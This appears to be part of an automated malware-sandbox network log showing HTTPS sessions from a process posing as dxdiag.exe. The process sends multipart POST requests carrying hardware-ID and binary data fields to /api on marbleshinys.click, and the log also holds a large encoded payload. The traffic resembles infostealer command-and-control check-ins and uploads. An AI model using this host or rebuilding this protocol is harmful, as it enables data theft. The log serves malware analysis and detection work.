                                                                                2024-12-30 14:55:30 UTC891INData Raw: 41 6f 56 31 6d 66 6b 49 37 39 2f 39 69 2b 5a 50 52 6a 4c 6c 35 37 35 53 34 46 5a 47 67 2f 6e 6a 50 31 67 47 38 43 54 78 39 7a 48 51 31 54 52 62 61 74 37 2f 43 54 4d 4b 49 49 6a 41 73 6d 4a 6b 72 35 63 78 6b 64 56 44 2b 50 4b 71 69 4e 54 67 74 33 46 78 34 67 63 46 66 46 76 70 33 6a 72 49 64 56 73 6c 32 49 55 68 6f 43 55 2b 51 79 50 52 6c 51 4a 35 73 79 33 4b 42 6a 48 6d 4e 44 55 77 55 6c 59 30 58 4b 75 64 50 77 73 77 79 61 43 49 77 66 43 69 70 57 2f 56 4d 38 41 46 45 6a 73 31 4f 56 34 55 2b 2b 59 30 74 6a 45 55 68 66 72 50 37 73 31 35 6d 7a 44 49 4d 68 30 54 63 36 43 6d 37 70 66 77 45 4e 53 41 2f 6e 4d 74 79 59 65 79 59 2f 45 32 73 5a 4f 56 73 4e 31 71 6e 33 38 4a 63 38 6c 6a 53 73 4a 68 73 6e 59 76 6b 79 50 47 42 6f 70 35 73 65 70 4b 67 54 4d 33 64 32 52
                                                                                Data Ascii: AoV1mfkI79/9i+ZPRjLl575S4FZGg/njP1gG8CTx9zHQ1TRbat7/CTMKIIjAsmJkr5cxkdVD+PKqiNTgt3Fx4gcFfFvp3jrIdVsl2IUhoCU+QyPRlQJ5sy3KBjHmNDUwUlY0XKudPwswyaCIwfCipW/VM8AFEjs1OV4U++Y0tjEUhfrP7s15mzDIMh0Tc6Cm7pfwENSA/nMtyYeyY/E2sZOVsN1qn38Jc8ljSsJhsnYvkyPGBop5sepKgTM3d2R
                                                                                2024-12-30 14:55:30 UTC1369INData Raw: 34 35 33 32 0d 0a 2f 48 69 38 58 50 2f 55 64 62 33 33 69 79 4f 2b 42 69 33 57 79 50 49 45 32 65 78 35 65 32 57 38 64 41 57 77 7a 6d 79 4b 51 74 48 38 57 65 7a 74 50 41 53 56 6e 56 63 4b 78 7a 2f 43 54 57 49 6f 59 71 43 38 61 43 32 50 63 55 79 46 67 61 55 4b 76 6f 71 7a 63 48 78 39 2f 33 33 4d 5a 4b 55 73 63 2f 75 7a 58 6d 62 4d 4d 67 79 48 52 4e 79 49 71 54 74 56 50 47 51 56 6b 49 34 63 4b 71 4b 68 76 45 6e 63 2f 65 77 30 78 54 33 48 53 72 64 50 67 6b 78 79 43 4e 49 51 36 47 79 64 69 2b 54 49 38 59 47 69 33 6c 7a 37 51 78 55 66 6d 65 7a 4e 48 50 55 68 58 4f 4d 62 30 37 2b 43 43 45 64 4d 67 6d 43 73 47 44 6c 62 4e 58 79 30 52 58 42 2b 4c 46 72 44 49 5a 77 4a 50 51 30 73 4a 42 57 39 31 36 71 33 76 2b 4c 63 6f 6d 67 32 78 44 68 6f 43 41 2b 51 79 50 62 31 63
                                                                                Data Ascii: 4532/Hi8XP/Udb33iyO+Bi3WyPIE2ex5e2W8dAWwzmyKQtH8WeztPASVnVcKxz/CTWIoYqC8aC2PcUyFgaUKvoqzcHx9/33MZKUsc/uzXmbMMgyHRNyIqTtVPGQVkI4cKqKhvEnc/ew0xT3HSrdPgkxyCNIQ6Gydi+TI8YGi3lz7QxUfmezNHPUhXOMb07+CCEdMgmCsGDlbNXy0RXB+LFrDIZwJPQ0sJBW916q3v+Lcomg2xDhoCA+QyPb1c
                                                                                2024-12-30 14:55:30 UTC1369INData Raw: 79 46 54 67 74 33 46 78 34 67 63 46 66 35 38 73 6e 47 2f 4d 34 6f 31 79 43 73 42 68 74 2f 59 73 31 6a 4c 51 31 59 42 35 38 47 6b 4a 42 54 42 6d 63 4c 5a 7a 6b 46 55 32 6e 65 6f 64 50 55 67 77 43 43 42 4b 67 48 46 68 4a 37 35 47 6f 39 48 51 6b 69 7a 6a 49 51 74 47 4d 43 64 77 63 37 50 42 42 75 52 63 61 4a 37 76 33 54 53 50 4a 38 72 45 6f 69 65 32 4c 35 59 6a 78 67 61 41 76 6e 4a 71 79 51 5a 79 5a 6e 4f 31 63 68 42 52 39 6c 35 6f 33 66 33 4b 63 73 71 6a 53 45 4b 7a 59 53 4b 71 31 66 4c 54 6c 5a 49 70 59 79 69 4f 46 4f 55 33 65 66 49 79 31 52 54 30 6a 2b 37 4e 65 5a 73 77 79 44 49 64 45 33 47 69 5a 53 79 55 38 52 4c 58 67 7a 72 77 61 34 75 48 63 57 52 79 74 50 50 56 6c 6a 55 64 36 35 79 2b 69 44 4a 4c 35 6f 76 44 49 62 4a 32 4c 35 4d 6a 78 67 61 4c 39 6a 37
                                                                                Data Ascii: yFTgt3Fx4gcFf58snG/M4o1yCsBht/Ys1jLQ1YB58GkJBTBmcLZzkFU2neodPUgwCCBKgHFhJ75Go9HQkizjIQtGMCdwc7PBBuRcaJ7v3TSPJ8rEoie2L5YjxgaAvnJqyQZyZnO1chBR9l5o3f3KcsqjSEKzYSKq1fLTlZIpYyiOFOU3efIy1RT0j+7NeZswyDIdE3GiZSyU8RLXgzrwa4uHcWRytPPVljUd65y+iDJL5ovDIbJ2L5MjxgaL9j7
                                                                                2024-12-30 14:55:30 UTC1369INData Raw: 7a 54 67 74 6a 51 42 41 32 52 55 36 64 30 39 47 7a 62 59 70 46 73 43 73 72 48 77 50 6c 54 78 30 68 55 43 2b 33 48 71 53 77 53 78 5a 76 48 31 38 39 4c 55 74 68 34 70 48 33 74 4b 38 6b 6c 69 43 63 45 7a 49 4f 5a 73 68 53 42 41 46 30 51 71 35 54 6c 45 68 54 61 6a 63 47 66 31 77 70 4d 6b 58 69 6f 4f 36 64 73 79 54 36 4a 4b 52 2f 43 69 4a 4f 72 58 38 6c 41 58 78 72 73 77 4b 38 76 45 4d 53 51 77 64 66 61 52 46 6a 52 62 62 5a 39 39 43 4b 45 59 73 67 72 46 59 62 66 32 49 68 44 78 41 42 46 52 76 4b 4d 6f 69 78 54 6c 4e 33 42 31 63 56 4b 52 39 56 35 72 33 6a 78 4a 4d 45 6b 6a 43 59 41 79 59 79 53 73 46 7a 50 54 31 38 41 34 4d 71 72 49 52 58 41 6b 49 4b 52 69 45 4e 4e 6b 53 66 6b 58 4f 55 68 77 6a 75 5a 47 51 72 47 31 74 69 6d 47 74 59 41 58 51 53 72 6c 4f 55 74 48
                                                                                Data Ascii: zTgtjQBA2RU6d09GzbYpFsCsrHwPlTx0hUC+3HqSwSxZvH189LUth4pH3tK8kliCcEzIOZshSBAF0Qq5TlEhTajcGf1wpMkXioO6dsyT6JKR/CiJOrX8lAXxrswK8vEMSQwdfaRFjRbbZ99CKEYsgrFYbf2IhDxABFRvKMoixTlN3B1cVKR9V5r3jxJMEkjCYAyYySsFzPT18A4MqrIRXAkIKRiENNkSfkXOUhwjuZGQrG1timGtYAXQSrlOUtH
                                                                                2024-12-30 14:55:30 UTC1369INData Raw: 2f 78 56 34 56 7a 6a 47 39 4f 2f 67 67 68 48 54 49 49 67 44 41 68 70 6d 78 58 4d 39 47 55 41 7a 6f 78 61 59 6e 47 73 71 57 77 64 58 48 51 31 50 56 66 36 39 38 38 53 72 42 4a 34 46 73 51 34 61 41 67 50 6b 4d 6a 32 5a 35 47 76 6e 2b 71 79 4d 49 6a 49 4b 4d 78 6f 68 44 57 5a 45 6e 35 48 44 33 49 39 59 70 67 53 51 4a 7a 34 65 63 73 31 6e 49 51 46 38 46 37 73 69 72 4a 42 54 4d 6b 63 33 59 77 45 74 52 30 58 44 6b 4e 62 38 72 33 47 7a 51 62 43 33 4e 6b 62 6d 33 58 39 30 41 52 55 62 79 6a 4b 49 73 55 35 54 64 7a 4e 62 4a 54 46 76 64 64 36 42 70 2f 79 66 4e 49 34 6b 6a 44 63 57 47 6b 72 46 47 79 55 42 52 41 4f 7a 45 6f 53 34 42 7a 5a 4b 43 6b 59 68 44 54 5a 45 6e 35 45 72 70 4b 38 4d 6a 79 67 55 4b 33 59 61 53 75 6c 2f 44 41 45 56 47 38 6f 79 69 4c 46 4f 55 33 63
                                                                                Data Ascii: /xV4VzjG9O/gghHTIIgDAhpmxXM9GUAzoxaYnGsqWwdXHQ1PVf6988SrBJ4FsQ4aAgPkMj2Z5Gvn+qyMIjIKMxohDWZEn5HD3I9YpgSQJz4ecs1nIQF8F7sirJBTMkc3YwEtR0XDkNb8r3GzQbC3Nkbm3X90ARUbyjKIsU5TdzNbJTFvdd6Bp/yfNI4kjDcWGkrFGyUBRAOzEoS4BzZKCkYhDTZEn5ErpK8MjygUK3YaSul/DAEVG8oyiLFOU3c
                                                                                2024-12-30 14:55:30 UTC1369INData Raw: 47 38 67 2f 6f 33 65 2f 64 49 51 6e 68 69 6b 4d 79 6f 32 66 74 30 62 4f 53 6c 59 4a 37 4d 75 75 4d 68 6a 65 6c 73 72 63 78 6b 78 63 30 58 47 6b 65 76 49 73 68 47 4c 49 4b 78 57 47 33 39 69 63 64 39 68 57 55 45 72 49 32 37 4d 71 46 4d 43 4c 79 64 37 4c 55 6c 6a 42 50 2b 6f 37 37 69 76 56 62 4e 41 36 48 64 47 41 68 2f 64 4e 6a 30 64 57 53 4c 4f 4d 72 69 38 64 77 5a 62 47 31 73 31 4d 56 74 52 36 72 6e 66 7a 4c 63 77 6c 67 69 6b 49 77 49 32 62 74 31 76 4f 54 46 34 42 35 63 58 6c 62 6c 50 4c 68 59 4b 48 69 48 4a 46 31 6d 65 70 61 37 30 65 78 7a 32 5a 4f 51 44 57 67 64 71 57 56 38 4e 44 58 77 2f 37 6a 4c 70 75 43 6f 79 61 7a 70 2b 51 42 46 58 56 63 36 64 38 38 53 50 4a 49 34 38 6e 41 73 79 4a 69 72 5a 52 78 30 78 53 42 66 6e 47 72 7a 49 61 78 5a 44 4d 31 39 70
                                                                                Data Ascii: G8g/o3e/dIQnhikMyo2ft0bOSlYJ7MuuMhjelsrcxkxc0XGkevIshGLIKxWG39icd9hWUErI27MqFMCLyd7LUljBP+o77ivVbNA6HdGAh/dNj0dWSLOMri8dwZbG1s1MVtR6rnfzLcwlgikIwI2bt1vOTF4B5cXlblPLhYKHiHJF1mepa70exz2ZOQDWgdqWV8NDXw/7jLpuCoyazp+QBFXVc6d88SPJI48nAsyJirZRx0xSBfnGrzIaxZDM19p
                                                                                2024-12-30 14:55:30 UTC1369INData Raw: 2b 6f 37 38 47 79 63 46 63 68 6b 54 66 6e 4a 32 4b 45 55 6c 77 42 76 43 2b 58 43 6f 6a 59 43 67 62 7a 50 31 4d 52 4a 57 74 6f 2f 36 6a 76 35 62 4a 78 38 78 6d 77 4a 31 38 66 41 36 51 61 55 46 51 6c 66 75 35 36 36 62 67 71 4d 69 34 4b 48 6d 67 6f 56 77 7a 2f 38 4f 37 67 76 31 6a 36 4f 4c 78 76 46 77 4b 61 48 64 39 68 57 55 42 4f 70 36 71 49 78 47 74 71 51 30 4f 48 32 61 6c 6a 51 66 4b 6f 35 7a 6a 72 4a 50 49 73 70 43 76 69 35 6c 72 35 41 79 45 35 63 43 4b 75 43 35 53 39 54 6c 4b 53 43 6c 34 68 37 47 35 46 6e 35 43 4f 2f 47 63 63 69 68 69 73 62 31 38 71 37 72 6b 4c 46 57 78 67 75 37 4e 32 73 4e 68 37 65 33 59 79 66 7a 67 51 4e 67 54 48 6b 66 2b 35 73 6e 48 7a 61 64 31 69 56 30 4d 6a 72 53 34 46 5a 47 68 36 72 6c 50 64 75 55 39 37 64 6d 70 2b 50 52 30 66 44
                                                                                Data Ascii: +o78GycFchkTfnJ2KEUlwBvC+XCojYCgbzP1MRJWto/6jv5bJx8xmwJ18fA6QaUFQlfu566bgqMi4KHmgoVwz/8O7gv1j6OLxvFwKaHd9hWUBOp6qIxGtqQ0OH2aljQfKo5zjrJPIspCvi5lr5AyE5cCKuC5S9TlKSCl4h7G5Fn5CO/Gccihisb18q7rkLFWxgu7N2sNh7e3YyfzgQNgTHkf+5snHzad1iV0MjrS4FZGh6rlPduU97dmp+PR0fD
                                                                                2024-12-30 14:55:30 UTC1369INData Raw: 39 30 6c 32 4c 49 4b 42 79 47 33 38 6a 72 44 35 6f 54 44 56 69 35 30 2b 73 35 55 39 72 64 6d 6f 32 47 42 45 65 52 4a 2b 51 38 2f 44 37 57 4b 6f 73 36 44 6f 47 35 70 6f 78 58 77 55 35 64 48 74 37 50 74 43 4d 54 78 36 50 38 2f 73 5a 50 55 74 31 70 6d 6b 58 4b 4c 38 6f 69 6a 7a 6f 63 68 73 6e 59 74 68 53 58 65 52 70 41 71 2f 50 72 59 41 75 4d 78 59 4c 71 79 30 70 62 31 6d 6d 31 4e 73 6f 76 31 53 2b 49 4a 30 32 49 78 35 37 35 44 4a 30 4f 47 67 7a 36 6a 50 31 77 51 5a 66 49 6b 59 69 59 46 6b 71 66 5a 75 52 74 76 33 53 57 59 73 67 2b 54 5a 37 48 33 37 70 47 33 55 5a 5a 48 75 69 4c 6d 78 34 31 7a 35 72 45 33 4d 5a 54 52 4a 4e 51 70 33 44 7a 49 4d 4d 36 74 68 49 59 78 59 6d 57 76 6b 4c 65 41 42 52 49 35 49 7a 39 47 56 50 64 6c 38 57 54 67 41 68 45 77 6e 47 76 62
                                                                                Data Ascii: 90l2LIKByG38jrD5oTDVi50+s5U9rdmo2GBEeRJ+Q8/D7WKos6DoG5poxXwU5dHt7PtCMTx6P8/sZPUt1pmkXKL8oijzochsnYthSXeRpAq/PrYAuMxYLqy0pb1mm1Nsov1S+IJ02Ix575DJ0OGgz6jP1wQZfIkYiYFkqfZuRtv3SWYsg+TZ7H37pG3UZZHuiLmx41z5rE3MZTRJNQp3DzIMM6thIYxYmWvkLeABRI5Iz9GVPdl8WTgAhEwnGvb


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.1149845172.67.148.1184438016C:\Windows\SysWOW64\dxdiag.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-12-30 14:55:31 UTC282OUTPOST /api HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: multipart/form-data; boundary=ET1RU0B9LQR8S4C3
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                Content-Length: 12833
                                                                                Host: marbleshinys.click
                                                                                2024-12-30 14:55:31 UTC12833OUTData Raw: 2d 2d 45 54 31 52 55 30 42 39 4c 51 52 38 53 34 43 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 36 46 41 39 41 46 36 41 37 39 43 36 44 46 31 33 38 41 43 44 44 45 31 34 38 46 39 37 42 33 32 0d 0a 2d 2d 45 54 31 52 55 30 42 39 4c 51 52 38 53 34 43 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 45 54 31 52 55 30 42 39 4c 51 52 38 53 34 43 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 71 63 68 4f 61 2d 2d 6e 65 77 0d 0a 2d 2d 45 54 31 52
                                                                                Data Ascii: --ET1RU0B9LQR8S4C3Content-Disposition: form-data; name="hwid"F6FA9AF6A79C6DF138ACDDE148F97B32--ET1RU0B9LQR8S4C3Content-Disposition: form-data; name="pid"2--ET1RU0B9LQR8S4C3Content-Disposition: form-data; name="lid"ZqchOa--new--ET1R
                                                                                2024-12-30 14:55:31 UTC1128INHTTP/1.1 200 OK
                                                                                Date: Mon, 30 Dec 2024 14:55:31 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=c3bhhr49un6o0575opclllg4b7; expires=Fri, 25 Apr 2025 08:42:10 GMT; Max-Age=9999999; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                X-Frame-Options: DENY
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                cf-cache-status: DYNAMIC
                                                                                vary: accept-encoding
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zRlYAFKfet8CrgfVDaar3t%2FgqQzvMTebihFyahzWLKQ2DR4lEp2elTFSItlvJnqcSiOrjIPN1ZC61P3qgaeJGavjsguI8vgpCpgLDapS5vxgiAloicoT6eoeassDo%2FGnGwURalI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8fa2df0b59840c76-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2165&min_rtt=1712&rtt_var=965&sent=8&recv=16&lost=0&retrans=0&sent_bytes=2847&recv_bytes=13773&delivery_rate=1705607&cwnd=151&unsent_bytes=0&cid=6de0f284277b11c1&ts=757&x=0"
                                                                                2024-12-30 14:55:31 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                Data Ascii: fok 8.46.123.189
                                                                                2024-12-30 14:55:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                3192.168.2.1149858172.67.148.1184438016C:\Windows\SysWOW64\dxdiag.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-12-30 14:55:32 UTC277OUTPOST /api HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: multipart/form-data; boundary=NZUOHX8B8FU
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                Content-Length: 15015
                                                                                Host: marbleshinys.click
                                                                                2024-12-30 14:55:32 UTC15015OUTData Raw: 2d 2d 4e 5a 55 4f 48 58 38 42 38 46 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 36 46 41 39 41 46 36 41 37 39 43 36 44 46 31 33 38 41 43 44 44 45 31 34 38 46 39 37 42 33 32 0d 0a 2d 2d 4e 5a 55 4f 48 58 38 42 38 46 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4e 5a 55 4f 48 58 38 42 38 46 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 71 63 68 4f 61 2d 2d 6e 65 77 0d 0a 2d 2d 4e 5a 55 4f 48 58 38 42 38 46 55 0d 0a 43 6f 6e 74 65 6e
                                                                                Data Ascii: --NZUOHX8B8FUContent-Disposition: form-data; name="hwid"F6FA9AF6A79C6DF138ACDDE148F97B32--NZUOHX8B8FUContent-Disposition: form-data; name="pid"2--NZUOHX8B8FUContent-Disposition: form-data; name="lid"ZqchOa--new--NZUOHX8B8FUConten
                                                                                2024-12-30 14:55:32 UTC1129INHTTP/1.1 200 OK
                                                                                Date: Mon, 30 Dec 2024 14:55:32 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=pemlajusneru9ab1a8qb3pf4oe; expires=Fri, 25 Apr 2025 08:42:11 GMT; Max-Age=9999999; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                X-Frame-Options: DENY
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                cf-cache-status: DYNAMIC
                                                                                vary: accept-encoding
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bUeRtVqGfFF%2BIsOAZPJ4EliqFFYS6DI%2FhFUOd1XirXRrn3CMbivYMKhDtnY5oH2PreMKjr9YW3Ph3rg9XooGTUKCBc9optMlFpZ%2F2987Ylenum7R2Wlygxv7f1ODJeYX37kDEwA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8fa2df13ff26433a-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1736&min_rtt=1722&rtt_var=655&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2847&recv_bytes=15950&delivery_rate=1695702&cwnd=32&unsent_bytes=0&cid=0dc39b07daee8c71&ts=542&x=0"
                                                                                2024-12-30 14:55:32 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                Data Ascii: fok 8.46.123.189
                                                                                2024-12-30 14:55:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                4192.168.2.1149869172.67.148.1184438016C:\Windows\SysWOW64\dxdiag.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-12-30 14:55:33 UTC282OUTPOST /api HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: multipart/form-data; boundary=5YX4CKCOBDQTSL5T
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                Content-Length: 20414
                                                                                Host: marbleshinys.click
                                                                                2024-12-30 14:55:33 UTC15331OUTData Raw: 2d 2d 35 59 58 34 43 4b 43 4f 42 44 51 54 53 4c 35 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 36 46 41 39 41 46 36 41 37 39 43 36 44 46 31 33 38 41 43 44 44 45 31 34 38 46 39 37 42 33 32 0d 0a 2d 2d 35 59 58 34 43 4b 43 4f 42 44 51 54 53 4c 35 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 35 59 58 34 43 4b 43 4f 42 44 51 54 53 4c 35 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 71 63 68 4f 61 2d 2d 6e 65 77 0d 0a 2d 2d 35 59 58 34
                                                                                Data Ascii: --5YX4CKCOBDQTSL5TContent-Disposition: form-data; name="hwid"F6FA9AF6A79C6DF138ACDDE148F97B32--5YX4CKCOBDQTSL5TContent-Disposition: form-data; name="pid"3--5YX4CKCOBDQTSL5TContent-Disposition: form-data; name="lid"ZqchOa--new--5YX4
                                                                                2024-12-30 14:55:33 UTC5083OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 fd 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d ae 2f 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 f5 47 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 be 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 d7 1f 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 fa a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                Data Ascii: lrQM/64G6(X&~`aO
                                                                                2024-12-30 14:55:34 UTC1139INHTTP/1.1 200 OK
                                                                                Date: Mon, 30 Dec 2024 14:55:34 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=lql73s0bs515dofgn274scpd60; expires=Fri, 25 Apr 2025 08:42:13 GMT; Max-Age=9999999; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                X-Frame-Options: DENY
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                cf-cache-status: DYNAMIC
                                                                                vary: accept-encoding
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W8KS59rSAifVfHB9gF5awovPuUDhN%2BGzpyd%2FCFfzuetei0hkQshowhIuj%2Fm9v5JETC2yC0az%2B3CvfmwrqRV0rUQQYOJ0%2ByXrAJRmIPiaOjY%2Bcc%2F8hRCXHs00xLhN9FTCiC4na4A%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8fa2df1caa9b0f3e-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1732&min_rtt=1710&rtt_var=657&sent=12&recv=24&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21376&delivery_rate=1707602&cwnd=213&unsent_bytes=0&cid=b15fdb261cd4f6f6&ts=508&x=0"
                                                                                2024-12-30 14:55:34 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                Data Ascii: fok 8.46.123.189
                                                                                2024-12-30 14:55:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                5192.168.2.1164243172.67.148.1184438016C:\Windows\SysWOW64\dxdiag.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-12-30 14:55:36 UTC276OUTPOST /api HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: multipart/form-data; boundary=21MX5AWY95P
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                Content-Length: 1174
                                                                                Host: marbleshinys.click
                                                                                2024-12-30 14:55:36 UTC1174OUTData Raw: 2d 2d 32 31 4d 58 35 41 57 59 39 35 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 36 46 41 39 41 46 36 41 37 39 43 36 44 46 31 33 38 41 43 44 44 45 31 34 38 46 39 37 42 33 32 0d 0a 2d 2d 32 31 4d 58 35 41 57 59 39 35 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 31 4d 58 35 41 57 59 39 35 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 71 63 68 4f 61 2d 2d 6e 65 77 0d 0a 2d 2d 32 31 4d 58 35 41 57 59 39 35 50 0d 0a 43 6f 6e 74 65 6e
                                                                                Data Ascii: --21MX5AWY95PContent-Disposition: form-data; name="hwid"F6FA9AF6A79C6DF138ACDDE148F97B32--21MX5AWY95PContent-Disposition: form-data; name="pid"1--21MX5AWY95PContent-Disposition: form-data; name="lid"ZqchOa--new--21MX5AWY95PConten
                                                                                2024-12-30 14:55:37 UTC1131INHTTP/1.1 200 OK
                                                                                Date: Mon, 30 Dec 2024 14:55:37 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
